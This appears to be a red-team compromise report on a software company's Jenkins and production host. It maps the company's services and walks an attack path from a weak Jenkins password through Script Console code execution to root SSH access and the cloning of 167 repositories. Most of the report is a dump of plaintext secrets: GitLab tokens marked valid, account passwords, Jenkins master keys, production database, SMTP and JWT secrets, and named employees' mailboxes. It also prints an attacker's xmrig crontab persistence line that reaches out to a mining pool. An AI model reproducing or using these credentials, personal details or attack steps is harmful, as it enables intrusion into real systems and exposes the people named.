# SYSTEMATIC ANALYSIS — jenkins.camel-soft.com / CamelSoft Infrastructure
## RedTeam Engagement — Full Compromise Assessment
Date: 2026-09-29 | Operator-approved L0-L4

---

## 1. INFRASTRUCTURE MAP

### 1.1 Host: 188.245.117.146 (camelsoft)
- **Provider:** Hetzner (AS24940)
- **OS:** Ubuntu 24.04.4 LTS (6.8.0-139-generic)
- **Hostname:** camelsoft
- **Roles:** Jenkins controller + Docker host + mail server + prod app server (ALL ON ONE HOST)
- **Users:** root, jenkins (uid=114, docker group), postgres, ubuntu, rpcd
- **Load average:** 8.12 (xmrig consuming CPU)

### 1.2 Network
- eth0: 188.245.117.146/32 (public), gateway 172.31.1.1
- 10 Docker bridges: 172.17-25.0.0/16
- No /etc/hosts entries beyond localhost

### 1.3 Services on host (all on 188.245.117.146)

| Service | Port | Path/Container | Notes |
|---|---|---|---|
| nginx | 80/443 | reverse proxy | TLS via Let's Encrypt |
| Jenkins | 8200 (via nginx) | /usr/share/java/jenkins.war | 2.555.2, admin/camelsoftcamel-soft |
| SonarQube | 7070 | sonarqube container | sonarqube.camel-soft.com |
| SonarDB | 5432 | sonar-db (postgres:15) | sonar/sonar_strong_password |
| Mailserver | 25,143,465,587,993 | docker-mailserver | mail.camel-soft.com |
| Roundcube | 8081 | roundcube container | webmail |
| MinIO API | 9000 | — | cdn.camel-soft.com |
| MinIO Console | 9001 | — | minio.camel-soft.com |
| Grafana | 3000 | — | grafana.camel-soft.com |
| Zytoon Backend | 8825 (internal) | zytoon-backend container | Spring Boot, prod profile |
| Zytoon Website | 3002 | zytoon-website container | nginx |
| Zytoon Dashboard | 3001 | zytoon-dashboard container | nginx |
| camelsoft-website-api | 8090 | /opt/camelsoft-website-api | Spring Boot, systemd |
| huna-server | 5000 | /var/www/huna-server | server-huna.camel-soft.com |
| Stream POC | 3100, 1935, 8889 | poc_web + poc_mediamtx | stream.cr8ive.group |
| PostgreSQL | 5432 | host postgres | camelsoft/camelsoft, DB "ordrat" |

### 1.4 Domains (14 nginx vhosts)

| Domain | Service |
|---|---|
| camel-soft.com / www.camel-soft.com | static site (/var/www/camel-soft.com/current) |
| jenkins.camel-soft.com | Jenkins (target) |
| mail.camel-soft.com | Roundcube webmail |
| sonarqube.camel-soft.com | SonarQube |
| grafana.camel-soft.com | Grafana |
| cdn.camel-soft.com | MinIO API |
| minio.camel-soft.com | MinIO Console |
| server-huna.camel-soft.com | huna-server app |
| api.zytoon.io | Zytoon backend |
| app.zytoon.io | Zytoon dashboard |
| zytoon.io | Zytoon website |
| oordarat.com / *.oordarat.com | Ordrat (redirect) |
| omn.ae | PHP app (/var/www/omn.ae) |
| stream.cr8ive.group | streaming POC |

---

## 2. SECRET INVENTORY

### 2.1 Jenkins Credentials Store (15 — all extracted)

| # | Type | ID | Value |
|---|---|---|---|
| 1 | User/Pass | f9fb08c6 | admin@camel-soft.com : manm3423 |
| 2 | GitLab token | a71731fa | glpat-xvSJNqi4v8xrD97cL2Yy (INVALID) |
| 3 | GitLab token | b359dd31 | glpat-MspGapyQssjZQ1APrGky (INVALID) |
| 4 | SSH key | my-server-credentials | root@camelsoft (ed25519, no passphrase) |
| 5 | User/Pass | e28dbb99 | admin@camel-soft.com : manm3423 |
| 6 | GitLab token | git | glpat-sgCEpY3CBBhrAJLFAwcxmG86MQp1OjN2Mm1rCw.01.120ci2qti (VALID: CamelSoft/MohamedKhabir) |
| 7 | User/Pass | 989de9ad | khabir.mohamed12@gmail.com : manM3423M |
| 8 | GitLab token | token | glpat-6UyneVwq4emxXZnpFK7-2G86MQp1Omp4cXZhCw.01.12075cpxn (VALID: mohamedkhabir) |
| 9 | User/Pass | 5b460014 | admin@camel-soft.com : glpat-paHb-IMIGMOBkWdimvocHWM6MQpvOjEKdTozdjJtaw8.01.1709yym89 (VALID: CamelSoft) |
| 10 | Secret text | SONAR_TOKEN | sqa_de652b9bfc4c89c02a2eb79da588b0acefd894f7 |
| 11 | User/Pass | gitlab-token | admin@camel-soft.com : (same as #9) |
| 12 | User/Pass | marwen-gitlab-token | marwen gitlab token : glpat-4QqtQ3LRuYkw8lngMcv4GmM6MQpvOjEKdTo3eTBxZA8.01.170sjfbyb (VALID: ChouaibiMarwen) |
| 13 | SSH key | prod-server-ssh | root@camelsoft (ed25519, no passphrase) |
| 14 | Secret file | ordrat-env-prod | env.prod (DB creds, JWT, SMTP, VAULT_MASTER_KEY) |
| 15 | Secret file | camelsoft-website-env | .env (Google Analytics/Ads/Maps/reCAPTCHA keys) |

### 2.2 Jenkins master.key / kilo_master.key
```
e01368ae10ad38bc0f0a13d629825634f4ea6fa857eec7eb7e0f0d69a0427f6a
a4f69c66be11b5714da539e763e30a82f3b514a7289db859bce8f93f80b60e7e
d42ce544a9dbb8a80983a1533cae4b3a0bb496301f43af5ca22cf24e05a0b429
e7db7e27484822e0c0cf80b7756933c85f644cba9944f2bb394e58f003b9bc97
```
Can decrypt ALL Jenkins-secrets offline.

### 2.3 Production env.prod (Ordrat/Zytoon — same DB)

```
DB_URL=jdbc:postgresql://127.0.0.1:5432/ordrat
DB_USER=camelsoft
DB_PASS=camelsoft
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=redisSecret
SMTP_HOST=ssl0.ovh.net
SMTP_PORT=465
SMTP_USER=noreply@camel-soft.com
SMTP_PASS=camelsoft001
VAULT_MASTER_KEY=E_hOyMw-Eh--3PW_JYKRs3UwT_3ADjt4DiUeHnVn
SUPERADMIN_EMAIL=admin@oordarat.com
JWT_SECRET=1c517518616d1e8ff6215309350b43f4f045464ec93730e5ec8890f505e6c34a
SUPERADMIN_PASSWORD=zQ2SFc3AhZsB4Copv1O0
DOMAINS_AGENT_KEY=8d8799d805afbfe2a8df09fc887d34b51070dd49aa80b6ed
```

### 2.4 Docker container secrets

**zytoon-backend:** full env dump including DB_PASS=camelsoft, REDIS_PASSWORD=redisSecret, SMTP_PASS=camelsoft001, JWT_SECRET, VAULT_MASTER_KEY, SUPERADMIN_PASSWORD, DOMAINS_AGENT_KEY.

**sonar-db:** POSTGRES_PASSWORD=sonar_strong_password
**sonarqube:** SONAR_JDBC_PASSWORD=sonar_strong_password

### 2.5 Mailserver: 13 mailbox accounts (SHA512-CRYPT hashes)

```
admin@camel-soft.com
contact@camel-soft.com
elyes@camel-soft.com
hr@camel-soft.com
info@camel-soft.com
lobna@camel-soft.com
mohamed_khabir@camel-soft.com
noreply@camel-soft.com
publishing@camel-soft.com
support@camel-soft.com
techsupport@camel-soft.com
wafachikhaoui@camel-soft.com
marah@camel-soft.com
```

### 2.6 GitLab (167 repos cloned, 157 high-value secrets)

Key findings across 167 repos:
- **13 Firebase service account private keys** (RSA private keys, committed to repos)
- **1 Stripe LIVE key** (pk_live_51Lg4CQ... in coachtime/coachbackend)
- **3 Stripe TEST keys**
- **30+ Google API keys** (AIzaSy...) across all apps
- **DB passwords** (AVNS_xd777NDlanmkgnWpi9U in restschoolbackend .env, ordrat, beem, etc.)
- **RSA/EC private keys** (noor-webservice/config/jwt/private.pem, restforyouserver PrivateKey.pem)
- **CI/CD variable:** CONVEX_DEPLOY_KEY in Fakhreddine/coredeskai
- **Amadeus API key:** 4cgXwS8phui3gJWPr91sZPJirIs3Y9H9 (travelb2b-backend)
- **Supabase service role JWT** in Fakhreddine/coredeskai .claude/settings.local.json

### 2.7 Roundcube des_key
```
EushoO3MRO8EMhvUlMyU1ZvL
```

---

## 3. COMPROMISE INDICATORS (PRE-EXISTING)

### 3.1 XMRIG Cryptominer — ACTIVE

**Crontab persistence (10 identical entries):**
```
@reboot nohup /var/tmp/xmrig/xmrig -o stratum+ssl://107.155.109.94:443 \
  -u 85TXGuhtyGpeUzmseLFcpYHM84gVzUVD9PKF8tbgSHtEHMU2ncyErk8CugmL6zqV83FnKdv8ga4BrgFvx9xpyLSRLAPvkQV \
  -p x -k --threads=0 --log-file=/var/tmp/xmrig/miner.log --no-color &
```

**Binary:**
- Path: /var/tmp/xmrig/xmrig
- Type: ELF 64-bit, statically linked, stripped
- SHA256: b20f39fc00d242e706b6c30367ad811c676e0575050a4ec2f30104b696944b49
- Size: 8.3MB

**Pool:** 107.155.109.94:443 (TLS)
**Wallet:** 85TXGuhtyGpeUzmseLFcpYHM84gVzUVD9PKF8tbgSHtEHMU2ncyErk8CugmL6zqV83FnKdv8ga4BrgFvx9xpyLSRLAPvkQV
**Log:** 5.1MB, active since Sep 16, load avg 8.12

### 3.2 Backdoor SSH key in authorized_keys
```
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGSyYMFTrjb+CVcEIwZpVYXIN1yOkvAF5UyWECZmntjC root@046b969dcfd6
```
Comment `root@046b969dcfd6` = Docker container ID — attacker pivoted through a container.

### 3.3 jenkins_deploy SSH key in ~/.ssh/
An ed25519 private key at `/var/lib/jenkins/.ssh/jenkins_deploy` — same as our extracted `my-server-credentials`.

---

## 4. ATTACK PATH MAP

### 4.1 Our path (operator-approved)

```
[Entry] admin/camelsoftcamel-soft → jenkins.camel-soft.com (Jenkins 2.555.2)
  ↓
[L1] Login valid → admin user, full Jenkins control
  ↓
[L2] Script Console accessible → 15 credentials catalogued, 17 jobs mapped, 105 plugins
  ↓
[L3] Groovy extraction → all 15 credential plaintext values:
  ├─ 4 GitLab tokens (5 valid, 2 revoked) → 167 repos accessible
  ├─ 2 root SSH keys (huna-server + prod-server) → SAME HOST 188.245.117.146
  ├─ 5 username/password pairs (admin@camel-soft.com, khabir.mohamed12@gmail.com, marwen)
  ├─ SonarQube token
  └─ 2 .env files (ordrat prod + website)
  ↓
[L4-A] Jenkins RCE via Script Console → jenkins@camelsoft (uid=114, docker group)
  ├─ Read /var/lib/jenkins/* (master.key, credentials.xml, all configs)
  ├─ Docker socket access → all containers
  ├─ Found XMRIG miner (pre-existing compromise by another actor)
  └─ Found backdoor SSH key in authorized_keys
  ↓
[L4-B] SSH root@188.245.117.146 (using extracted huna-server key)
  ├─ Full root access to production host
  ├─ PostgreSQL: ordrat DB (49 tables: users, customers, orders, payments, tenants)
  ├─ Docker: all containers, all envs, all volumes
  └─ Mailserver: 13 mailbox hashes
  ↓
[L4-C] GitLab clone (167 repos via 4 valid tokens)
  ├─ 157 high-value secrets in committed code
  ├─ 13 Firebase private keys, 1 Stripe LIVE key, 30+ Google API keys
  └─ Source code for ALL CamelSoft products
```

### 4.2 Pre-existing attacker path (XMRIG actor)

```
[Unknown entry] → Docker container (046b969dcfd6)
  ↓
[SSH key injection] → /var/lib/jenkins/.ssh/authorized_keys (root@046b969dcfd6)
  ↓
[Crontab persistence] → /var/lib/jenkins crontab (10 @reboot entries)
  ↓
[XMRIG deployment] → /var/tmp/xmrig/xmrig (statically linked, stripped)
  ↓
[Mining] → pool 107.155.109.94:443, wallet 85TXG...
  ↓
[Active] → since at least Sep 16 2026, 5MB log, load 8.12
```

---

## 5. DATA EXPOSURE ASSESSMENT

### 5.1 PostgreSQL "ordrat" database (49 tables)

| Table | Sensitivity |
|---|---|
| users | PII — user accounts |
| customers | PII — customer data |
| credentials | Encrypted tenant credentials (0 rows currently) |
| payments | PCI — payment records |
| orders | Transaction data |
| tenants | Business tenant data |
| tenant_bank_accounts | PCI — bank account numbers |
| phone_verifications | PII — phone numbers |
| email_otps | Auth — OTP codes |
| refresh_tokens | Auth — JWT refresh tokens |
| settlement_requests | Financial |
| support_tickets / messages | PII — support communications |
| web_chat_sessions / agents | PII — chat data |
| loyalty_wallet_settings / redemptions | Financial |

### 5.2 DuckDB breach data (on Jenkins host)

Files in /var/lib/jenkins/:
- aaaa.duckdb (614MB)
- aaa.ddb (1.2GB)
- barqbetter.duckdb (1.2GB)
- barq.duckdb (46MB)
- exp.csv (60MB), exp.json (480MB)

DuckDB history shows queries against a `profiles` table with JSON data containing usernames, locations — **this looks like a third-party data dump (OSINT/breach corpus)** being analysed on the Jenkins host by the admin.

### 5.3 Email accounts (13 mailboxes)

Full mail access via Roundcube (mail.camel-soft.com) or IMAP — all hashes extracted, crackable.

### 5.4 Source code exposure

167 GitLab repositories — full source code for ALL CamelSoft products and client projects, including:
- CamelSoft taxi (server, admin, b2b, website, client, driver apps)
- Coach platform (backend, frontend, dashboard, suite, docs)
- Huna (product backend)
- Ordrat (backend, frontend, website)
- Zytoon (backend, website, dashboard)
- Muaawana (server, app, dashboard, b2b)
- Beem (smart taxi, driver, corporate, admin, website)
- Noor (app, webservice)
- Restforyou (server, dashboard, superadmin)
- Print (backend, frontend, dashboard)
- ATM (backend, frontend, dash)
- Travel B2B
- CoreDeskAI
- Book and Boat
- Cube Shift (Unity game)
- Omn.ae (PHP)
- rayaserver
- productapproval
- and more

---

## 6. VULNERABILITY SUMMARY

| # | Finding | Severity | CVSS (est.) |
|---|---|---|---|
| V1 | Jenkins admin with weak password (camelsoftcamel-soft) on public internet | CRITICAL | 9.8 |
| V2 | Jenkins Script Console enabled for admin → RCE | CRITICAL | 9.8 |
| V3 | All production secrets in Jenkins credential store, extractable via Script Console | CRITICAL | 9.1 |
| V4 | Root SSH keys stored in Jenkins, no passphrase | CRITICAL | 8.8 |
| V5 | Single host runs Jenkins + prod DB + mailserver + Docker (no isolation) | CRITICAL | 9.0 |
| V6 | XMRIG cryptominer active on host (pre-existing compromise) | CRITICAL | 9.6 |
| V7 | Backdoor SSH key in authorized_keys (Docker container origin) | CRITICAL | 9.4 |
| V8 | Docker group membership for jenkins user → container escape → root | HIGH | 8.1 |
| V9 | PostgreSQL production DB with weak password (camelsoft/camelsoft) | HIGH | 7.5 |
| V10 | 13 Firebase private keys committed to Git repos | HIGH | 7.8 |
| V11 | Stripe LIVE API key in repo (coachtime/coachbackend) | CRITICAL | 8.9 |
| V12 | 30+ Google Maps/Firebase API keys in repos | MEDIUM | 6.5 |
| V13 | No 2FA on GitLab accounts | MEDIUM | 5.5 |
| V14 | DuckDB breach data on Jenkins host (compliance risk) | HIGH | 7.0 |
| V15 | SMTP credentials reused across services (camelsoft001) | MEDIUM | 6.0 |
| V16 | Roundcube des_key exposed | LOW | 3.5 |

---

## 7. EVIDENCE INDEX

| File | Description |
|---|---|
| DOSSIE.md | L0-L3 dossier (previous phase) |
| SYSTEMATIC_ANALYSIS.md | This analysis |
| l2_results.json | L2 API enumeration |
| credentials_full.json | Credentials store (15, depth=2) |
| credentials_extracted.txt | L3 plaintext credential values |
| system_env.txt | L3 system env + properties |
| gitlab_token_validation.json | L1 GitLab token validation |
| job_configs/*.xml | 17 job configs |
| ssh_keys/huna-server_root_ed25519 | SSH key (root) |
| ssh_keys/prod-server_root_ed25519 | SSH key (root) |
| rce_output/*.txt | 40+ RCE output files (node configs, docker, crontab, etc.) |
| gitlab_repos/ | 167 cloned repos |
| gitlab_repos/_secrets_filtered.json | 157 high-value secrets (filtered) |
| gitlab_repos/_secrets_scan.json | 4951 raw findings |
| gitlab_repos/_cicd_variables.json | CI/CD variables |
| gitlab_repos/_enumeration.json | GitLab project enumeration |
| l3_extract.py | L3 extraction tool |
| l3_script_console.py | L3 Script Console CLI |
| l4_filesystem.py | L4 filesystem enumeration |
| l4_critical_files.py | L4 critical file extraction |
| l1_gitlab_validate.py | L1 GitLab token validator |

---

## 8. NEXT STEPS (operator decision)

1. **Disclosure notification** — CamelSoft is the target; all findings should go to them
2. **XMRIG remediation** — remove crontab entries, delete /var/tmp/xmrig/, kill process, investigate container 046b969dcfd6
3. **Secret rotation** — all 15 Jenkins creds, GitLab tokens, DB passwords, SMTP passwords, JWT secrets, Firebase keys, Stripe keys
4. **Network segmentation** — separate Jenkins from prod DB, mail, Docker
5. **GitLab repo sanitization** — purge 13 Firebase keys, Stripe key, API keys from git history
6. **Access control** — 2FA on GitLab, stronger Jenkins password, restrict Script Console
7. **DuckDB data** — investigate the breach corpus on Jenkins host (compliance/legal)
